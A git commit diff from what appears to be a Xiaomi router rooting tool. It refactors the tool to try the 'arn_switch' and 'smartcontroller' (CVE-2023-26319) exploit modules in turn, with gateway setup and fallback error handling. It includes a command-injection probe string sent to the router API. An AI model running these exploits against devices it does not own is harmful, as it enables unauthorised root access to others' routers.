connect: Multi exploit test

8 months ago · cc1a760729
parent 3f3b921967
commit cc1a760729
4 changed files with 69 additions and 62 deletions
--- a/connect.py
+++ b/connect.py
@ -51,13 +51,24 @@ dn = gw.device_name
 #  import connect4
 #  sys.exit(0)

-#if dn in 'RD01 RD02 RD03 CR8818 RD04 RD05 RD06 CR8816 CR8819 RD08 ':
-if dn[:2] in ['RD','BE','RN'] or dn.startswith('CR88') or dn == 'RA80V2':
-  import connect6
-  sys.exit(0)
-
 if gw.model_id <= 0 or gw.model_id >= gw.get_modelid_by_name('R2100'):
-  import connect5
+    # init gw and check ssh
+    gw = create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True)
+
+    exp_modules = [
+        'connect6',  # arn_switch/start_binding
+        'connect5',  # smartcontroller
+    ]
+    for mod_name in exp_modules:
+        try:
+            import_module(mod_name, gw)
+            break  # Ok
+        except ExploitNotWorked as e:
+            print('WARN:', str(e))
+            continue  # try next module
+        except Exception:
+            raise
+
    sys.exit(0)

 # ===============================================================================
--- a/connect5.py
+++ b/connect5.py
@ -17,32 +17,13 @@ import json
 import xmir_base
 from gateway import *

-class ExploitError(Exception): pass

-
-gw = Gateway(timeout = 4, detect_ssh = False)
-if gw.status < 1:
-    die("Xiaomi Mi Wi-Fi device not found (IP: {})".format(gw.ip_addr))
-
-print("device_name =", gw.device_name)
-print("rom_version = {} {}".format(gw.rom_version, gw.rom_channel))
-print("mac address = {}".format(gw.mac_address))
-
-dn = gw.device_name
-gw.ssh_port = 22
-ret = gw.detect_ssh(verbose = 1, interactive = True)
-if ret == 23:
-    if gw.use_ftp:
-        die("Telnet and FTP servers already running!")
-    print("Telnet server already running, but FTP server not respond")
-elif ret > 0:
-    die(0, "SSH server already installed and running")
+try:
+    gw = inited_gw
+except NameError:
+    gw = create_gateway(die_if_sshOk = True)

 ccode = gw.device_info["countrycode"]
-if ccode == "CN":
-    print('CountryCode = CN')
-
-stok = gw.web_login()

 # CVE-2023-26319   Note: https://blog.thalium.re/posts/rooting-xiaomi-wifi-routers/

@ -149,7 +130,7 @@ def exec_tiny_cmd(cmd, act_delay = 2):
        code = dres['code']
    except Exception:
        if res == 'Internal Server Error':
-            die(f'Exploit "smartcontroller" not working! [{res}]')
+            raise ExploitNotWorked(f'Exploit "smartcontroller" not working! [{res}]')
        raise ExploitError(f'Error on parse response for command "scene_setting" => {res}')
    if code != 0:
        raise ExploitError(f'Error on exec command "scene_setting" => {res}')
@ -241,13 +222,13 @@ hackCheck = False
 res = exec_smart_command("aaaaa;$", ignore_err_code = 2)
 if isinstance(res, dict):
    if res['msg'] != 'api not exists':
-        die(f'Smartcontroller return error: {res}')
+        raise ExploitNotWorked(f'Smartcontroller return error: {res}')
 else:
    if 'Internal Server Error' in res:
        print(f'Detect using xiaoqiang "hackCheck" fix ;-)')
        hackCheck = True
    else:
-        die(f'Smartcontroller return Error: {res}')
+        raise ExploitNotWorked(f'Smartcontroller return Error: {res}')

 # get device orig system time
 dst = gw.get_device_systime()
@ -291,7 +272,7 @@ gw.set_device_systime(dst, wait = False)
 if not sc_activated:
    time.sleep(1)
    reset_smart_task()
-    die('Exploit "smartcontroller" not working!!!')
+    raise ExploitNotWorked('Exploit "smartcontroller" not working!!!')

 #print('Logger ...')
 #res = exec_cmd("logger hello")
--- a/connect6.py
+++ b/connect6.py
@ -10,33 +10,10 @@ import xmir_base
 from gateway import *


-gw = Gateway(timeout = 4, detect_ssh = False)
-if gw.status < 1:
-    die(f"Xiaomi Mi Wi-Fi device not found (IP: {gw.ip_addr})")
-
-print(f"device_name = {gw.device_name}")
-print(f"rom_version = {gw.rom_version} {gw.rom_channel}")
-print(f"mac address = {gw.mac_address}")
-
-dn = gw.device_name
-gw.ssh_port = 22
-ret = gw.detect_ssh(verbose = 1, interactive = True)
-if ret == 23:
-    if gw.use_ftp:
-        die("Telnet and FTP servers already running!")
-    print("Telnet server already running, but FTP server not respond")
-elif ret > 0:
-    #die(0, "SSH server already installed and running")
-    pass
-
-info = gw.get_init_info()
-if not info or info["code"] != 0:
-    die('Cannot get init_info')
-
-ccode = info["countrycode"]
-print(f'Current CountryCode = {ccode}')
-
-stok = gw.web_login()
+try:
+    gw = inited_gw
+except NameError:
+    gw = create_gateway(die_if_sshOk = False)


 def exploit_1(cmd, api = 'API/misystem/arn_switch'):
@ -79,7 +56,7 @@ for idx, exp_func in enumerate(exp_list):
 gw.set_diag_iperf_test_thr(20)

 if not exec_cmd:
-    die('Exploits arn_switch/start_binding not working!!!')
+    raise ExploitNotWorked('Exploits arn_switch/start_binding not working!!!')

 if exec_cmd == exploit_1:
    print('Exploit "arn_switch" detected!') 
--- a/gateway.py
+++ b/gateway.py
@ -31,6 +31,11 @@ from multiprocessing import shared_memory
 import xqmodel


+class ExploitError(Exception): pass
+
+class ExploitNotWorked(Exception): pass
+
+
 def die(*args):
  err = 1
  prefix = "ERROR: "
@ -973,6 +978,39 @@ class Gateway():
    return hasher.hexdigest()


+#===============================================================================
+
+def import_module(mod_name, gw):
+    import importlib.util
+    mod_spec = importlib.util.spec_from_file_location(mod_name, f"{mod_name}.py")
+    mod_object = importlib.util.module_from_spec(mod_spec)
+    sys.modules[mod_name] = mod_object
+    if gw is not None:
+        mod_object.inited_gw = gw
+    mod_spec.loader.exec_module(mod_object)
+
+def create_gateway(timeout = 4, die_if_sshOk = True, die_if_ftpOk = True, web_login = True, ssh_port = 22):
+    gw = Gateway(timeout = timeout, detect_ssh = False)
+    if gw.status < 1:
+        die(f"Xiaomi Mi Wi-Fi device not found (IP: {gw.ip_addr})")
+    print(f"device_name = {gw.device_name}")
+    print(f"rom_version = {gw.rom_version} {gw.rom_channel}")
+    print(f"mac_address = {gw.mac_address}")
+    gw.ssh_port = ssh_port if ssh_port else 22
+    ret = gw.detect_ssh(verbose = 1, interactive = True)
+    if ret == 23:
+        if gw.use_ftp and die_if_ftpOk:
+            die("Telnet and FTP servers already running!")
+        print("Telnet server already running, but FTP server not respond")
+    elif ret > 0:
+        if die_if_sshOk:
+            die(0, "SSH server already installed and running")
+    ccode = gw.device_info["countrycode"]
+    print(f'CountryCode = {ccode}')
+    if web_login:
+        gw.web_login()
+    return gw
+
 #===============================================================================
 if __name__ == "__main__":
  if len(sys.argv) > 1: